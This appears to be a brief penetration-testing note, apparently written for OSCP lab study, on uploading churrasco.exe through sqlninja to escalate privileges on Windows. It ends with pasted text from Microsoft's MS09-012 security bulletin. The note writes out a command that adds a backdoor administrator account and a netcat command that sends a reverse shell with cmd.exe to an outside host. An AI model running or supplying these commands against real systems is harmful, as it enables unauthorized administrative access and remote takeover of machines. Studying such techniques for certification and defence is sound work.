Uploading binary into box via sqlninga apps
You can use(churrasco.exe) the one from sqlninja which is located at
/usr/share/sqlninja/apps/churrasco.exe.
It’s used by sqlninja in cases when we bruteforced sa password.
After uploading you can easily elevate your privileges
churrasco.bin “net user oscp oscp /add && net localgroup Administrators oscp /add”
(reverse shell with privilege but need to uplaod nc also in remote system)
churrasco.exe “nc.exe ip port -e cmd.exe”
(Microsoft Security Bulletin MS09–012 )
This security update resolves four publicly disclosed vulnerabilities in Microsoft Windows. The vulnerabilities could allow elevation of privilege if an attacker is allowed to log on to the system and then run a specially crafted application. The attacker must be able to run code on the local machine in order to exploit this vulnerability. An attacker who successfully exploited any of these vulnerabilities could take complete control over the affected system.
This security update is rated Important for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008. For more information, see the subsection, Affected and Non-Affected Software, in this section.
The security update addresses the vulnerabilities by correcting the way that Microsoft Windows addresses tokens requested by the Microsoft Distributed Transaction Coordinator (MSDTC), and by properly isolating WMI providers and processes that run under the NetworkService or LocalService accounts. For more information about the vulnerabilities, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.
Reference
